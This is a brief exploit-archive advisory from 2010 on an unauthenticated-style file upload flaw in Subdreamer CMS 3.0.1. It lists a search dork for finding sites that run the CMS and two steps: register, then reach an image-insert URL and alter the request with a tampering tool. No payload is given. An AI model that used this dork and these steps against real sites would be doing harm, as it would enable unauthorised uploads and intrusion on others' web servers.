Subdreamer.v3.0.1 cms upload Vulnerability

2010-03-15
ID: 11301
CVE: None
Download vulnerable application: None
========================================================================================
| # Title    : 
| # Author   : indoushka
| # Dork     : Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media                                                            $
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug      : upload
======================      Exploit By indoushka       =================================
# Exploit  :
      1- to Register go to : http://127.0.0.1/upload/index.php?categoryid=6
  2- after Register go to http://127.0.0.1/upload/index.php?categoryid=3&p17_sectionid=2&p17_action=insertimage (and use tamper data)
1-4-2 (www02)